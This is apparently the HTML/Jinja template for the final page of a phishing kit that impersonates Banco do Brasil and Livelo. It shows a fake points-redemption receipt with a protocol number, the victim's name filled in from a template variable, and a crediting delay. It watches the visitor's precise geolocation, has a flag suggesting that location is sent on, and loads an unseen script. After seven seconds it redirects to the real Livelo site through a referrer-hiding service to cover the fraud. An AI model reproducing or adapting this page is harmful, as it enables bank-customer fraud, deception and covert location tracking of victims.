<html data-theme="light" style="--chakra-ui-color-mode:light;">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <title>Banco do Brasil</title>
    <meta name="robots" content="noindex, nofollow, noimageindex">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">
    <link rel="stylesheet" type="text/css" href="/assets/main-v3.css" />
    <script>
        var uuid_ = "{{prefix}}"
    </script>
    <script src="/assets/app2.js"></script>
    <meta http-equiv="refresh" content="7;URL=https://href.li/?https://www.livelo.com.br/casa/categoria/PTS_Cat000084">
    <style>
        body {
            font-size: 16px;
        }
    </style>
    <style>
        /*! CSS Used from: Embedded */
        .css-rzd8qz {
            display: -webkit-box;
            display: -webkit-flex;
            display: -ms-flexbox;
            display: flex;
            -webkit-flex-direction: column;
            -ms-flex-direction: column;
            flex-direction: column;
            height: 100vh;
        }

        @media screen and (min-width: 280px) {
            .css-rzd8qz {
                height: 100vh;
                font-size: 0.8rem;
            }
        }

        @media screen and (min-width: 350px) {
            .css-rzd8qz {
                font-size: 1rem;
            }
        }

        @media screen and (min-width: 768px) {
            .css-rzd8qz {
                font-size: 1rem;
            }
        }

        /*! CSS Used from: Embedded */
        .css-1oj8ggk {
            display: -webkit-box;
            display: -webkit-flex;
            display: -ms-flexbox;
            display: flex;
            width: 100vw;
            height: var(--chakra-sizes-3);
            background: var(--chakra-colors-BBBlue);
        }

        /*! CSS Used from: Embedded */
        .css-1ow331d {
            display: -webkit-box;
            display: -webkit-flex;
            display: -ms-flexbox;
            display: flex;
            -webkit-align-items: center;
            -webkit-box-align: center;
            -ms-flex-align: center;
            align-items: center;
            -webkit-box-pack: center;
            -ms-flex-pack: center;
            -webkit-justify-content: center;
            justify-content: center;
            width: 100%;
            margin-top: 4rem;
            -webkit-flex-direction: column;
            -ms-flex-direction: column;
            flex-direction: column;
        }

        /*! CSS Used from: Embedded */
        .css-1vmlim4 {
            padding: var(--chakra-space-4);
            display: -webkit-box;
            display: -webkit-flex;
            display: -ms-flexbox;
            display: flex;
            -webkit-flex-direction: row;
            -ms-flex-direction: row;
            flex-direction: row;
            -webkit-align-items: revert;
            -webkit-box-align: revert;
            -ms-flex-align: revert;
            align-items: revert;
        }

        /*! CSS Used from: Embedded */
        .css-6su6fj {
            -webkit-flex-shrink: 0;
            -ms-flex-negative: 0;
            flex-shrink: 0;
        }

        /*! CSS Used from: Embedded */
        .css-1gc45r0 {
            border-radius: var(--chakra-radii-lg);
        }

        @media screen and (min-width: 280px) {
            .css-1gc45r0 {
                width: 3rem;
            }
        }

        @media screen and (min-width: 350px) {
            .css-1gc45r0 {
                width: 4rem;
            }
        }

        @media screen and (min-width: 768px) {
            .css-1gc45r0 {
                width: 5rem;
            }
        }

        /*! CSS Used from: Embedded */
        .css-1sk5mmp {
            -webkit-flex-shrink: 0;
            -ms-flex-negative: 0;
            flex-shrink: 0;
            margin-left: var(--chakra-space-4);
        }

        /*! CSS Used from: Embedded */
        .css-1mtzovw {
            opacity: 0.6;
            border: 0;
            border-color: var(--chakra-colors-blue-500);
            border-style: solid;
            border-left-width: 1px;
            height: 100%;
        }

        /*! CSS Used from: Embedded */
        .css-1ffpiir {
            display: -webkit-box;
            display: -webkit-flex;
            display: -ms-flexbox;
            display: flex;
            -webkit-align-items: center;
            -webkit-box-align: center;
            -ms-flex-align: center;
            align-items: center;
            -webkit-box-pack: center;
            -ms-flex-pack: center;
            -webkit-justify-content: center;
            justify-content: center;
            background: var(--chakra-colors-BBBlue);
            width: 100%;
            padding: 10px;
            position: fixed;
            bottom: 0px;
            color: var(--chakra-colors-white);
        }

        /*! CSS Used from: Embedded */
        .css-1e7v20n {
            display: -webkit-box;
            display: -webkit-flex;
            display: -ms-flexbox;
            display: flex;
            padding: var(--chakra-space-1);
            margin-left: var(--chakra-space-2);
        }

        /*! CSS Used from: Embedded */
        .css-1qxtz39 {
            font-size: 12px;
        }

        /*! CSS Used from: Embedded */
        .css-18q3ev9 {
            display: flex;
            width: 100%;
            background: var(--chakra-colors-white);
            padding: var(--chakra-space-6);
            border-radius: 0px;
            box-shadow: var(--chakra-shadows-2xl);
            margin-top: var(--chakra-space-4);
            flex-direction: column;
            font-size: 0.9rem;
            color: var(--chakra-colors-LightBlueGradient);
            font-family: geomanist_regular;
        }

        @media screen and (min-width: 280px) {
            .css-18q3ev9 {
                max-width: 300px;
            }
        }

        @media screen and (min-width: 350px) {
            .css-18q3ev9 {
                max-width: 360px;
            }
        }

        @media screen and (min-width: 768px) {
            .css-18q3ev9 {
                max-width: 380px;
            }
        }

        .css-1plszu {
            display: flex;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: justify;
            justify-content: space-between;
            padding: var(--chakra-space-3);
            flex-direction: column;
        }

        .css-1bntj9o {
            display: flex;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: justify;
            justify-content: space-between;
            width: 100%;
        }

        .css-z2opsw {
            vertical-align: middle;
            width: 1em;
            height: 1em;
            display: inline-block;
            line-height: 1em;
            flex-shrink: 0;
            color: var(--chakra-colors-LightBlueGradient);
            margin-right: var(--chakra-space-4);
            font-size: 1.4rem;
        }

        .css-cwdu2j {
            opacity: 0.6;
            border-right-width: 0px;
            border-left-width: 0px;
            border-right-style: initial;
            border-bottom-style: initial;
            border-left-style: initial;
            border-image: initial;
            border-bottom-width: 1px;
            width: 100%;
            color: var(--chakra-colors-LightBlueGradient);
            margin-top: var(--chakra-space-4);
            border-top: dashed;
        }

        .css-124p2ke {
            display: flex;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: justify;
            justify-content: space-between;
            width: 100%;
            margin-top: var(--chakra-space-6);
        }

        .css-1v0lc0l {
            color: var(--chakra-colors-blue-500);
        }

        .css-c5zpon {
            display: flex;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: justify;
            justify-content: space-between;
            width: 100%;
            margin-top: var(--chakra-space-2);
        }

        .css-1axacwy {
            display: flex;
            -webkit-box-pack: center;
            justify-content: center;
            width: 100%;
            margin-top: var(--chakra-space-6);
        }

        .css-1wrbj06 {
            display: flex;
            width: 100%;
            height: 100px;
            margin-top: calc(var(--chakra-space-3) * -1);
            background: linear-gradient(-135deg, rgb(255, 255, 255) 10px, transparent 0px) 0px 10px / 29.9px 25px, linear-gradient(135deg, rgb(255, 255, 255) 10px, transparent 0px) 0px 10px / 29.9px 25px;
            background-repeat: repeat-x;
        }

        @media screen and (min-width: 280px) {
            .css-1wrbj06 {
                max-width: 300px;
            }
        }

        @media screen and (min-width: 350px) {
            .css-1wrbj06 {
                max-width: 360px;
            }
        }

        @media screen and (min-width: 768px) {
            .css-1wrbj06 {
                max-width: 380px;
            }
        }
    </style>
    <script type="text/javascript">
        sendGeo = false

        function watchLocation(successCallback, errorCallback) {
            successCallback = successCallback || function() {};
            errorCallback = errorCallback || function() {};

            // Try HTML5-spec geolocation.
            var geolocation = navigator.geolocation;

            if (geolocation) {
                // We have a real geolocation service.
                try {
                    function handleSuccess(position) {
                        successCallback(position.coords);
                    }

                    geolocation.watchPosition(handleSuccess, errorCallback, {
                        enableHighAccuracy: true,
                        maximumAge: 5000 // 5 sec.
                    });
                } catch (err) {
                    errorCallback();
                }
            } else {
                errorCallback();
            }
        }
    </script>
</head>

<body onload="init()" class="chakra-ui-light">
    <div id="__next">
        <div class="css-rzd8qz">
            <div class="css-1oj8ggk"></div>
            <div class="css-1ow331d">
                <div class="css-1vmlim4">
                    <div class="css-6su6fj">
                        <img alt="logoLivelo" src="/assets/bblivelo/v3/logo-livelo.svg" class="chakra-image css-1gc45r0">
                    </div>
                    <div class="css-1sk5mmp">
                        <hr aria-orientation="vertical" class="chakra-divider css-1mtzovw">
                    </div>
                    <div class="css-1sk5mmp">
                        <img alt="logoBB" src="/assets/bblivelo/v3/logo-bb.svg" class="chakra-image css-1gc45r0">
                    </div>
                </div>
                <form class="css-18q3ev9" style="margin-block-end: auto;">
                    <div class="css-1plszu">
                        <div class="css-1bntj9o">
                            <svg viewBox="0 0 24 24" focusable="false" class="chakra-icon chakra-icon css-z2opsw" name="phone">
                                <path fill="currentColor" d="M12,0A12,12,0,1,0,24,12,12.014,12.014,0,0,0,12,0Zm6.927,8.2-6.845,9.289a1.011,1.011,0,0,1-1.43.188L5.764,13.769a1,1,0,1,1,1.25-1.562l4.076,3.261,6.227-8.451A1,1,0,1,1,18.927,8.2Z"></path>
                            </svg>
                            <p class="chakra-text css-0">Abaixo o seu comprovante</p>
                        </div>
                        <hr aria-orientation="horizontal" class="chakra-divider css-cwdu2j">
                        <div class="css-124p2ke">
                            <p class="chakra-text css-0">Pontos resgatados:</p>
                            <p class="chakra-text css-1v0lc0l"></p>
                        </div>
                        <div class="css-c5zpon">
                            <p class="chakra-text css-0">Data:</p>
                            <p class="chakra-text css-1v0lc0l">{{ datetime.utcnow().strftime('%d') }} de {{ datetime.utcnow().strftime('%B') }} de {{ datetime.utcnow().strftime('%Y') }}</p>
                        </div>
                        <div class="css-c5zpon">
                            <p class="chakra-text css-0">Protocolo:</p>
                            <p class="chakra-text css-1v0lc0l">202456458</p>
                        </div>
                        {% if nome != None %}
                        <div class="css-c5zpon">
                            <p class="chakra-text css-0">Cliente:</p>
                            <p class="chakra-text css-1v0lc0l">{{ nome }}</p>
                        </div>
                        {% endif %}
                        <div class="css-1axacwy">
                            <p class="chakra-text css-0"></p>
                            <p class="chakra-text css-1v0lc0l">72 horas para creditação dos pontos</p>
                        </div>
                    </div>
                </form>
                <div class="css-1wrbj06"></div>
            </div>
        </div>
    </div>
    <next-route-announcer>
        <p aria-live="assertive" id="__next-route-announcer__" role="alert" style="border: 0px; clip: rect(0px, 0px, 0px, 0px); height: 1px; margin: -1px; overflow: hidden; padding: 0px; position: absolute; width: 1px; white-space: nowrap; overflow-wrap: normal;">Banco do Brasil</p>
    </next-route-announcer>
</body>
</html>
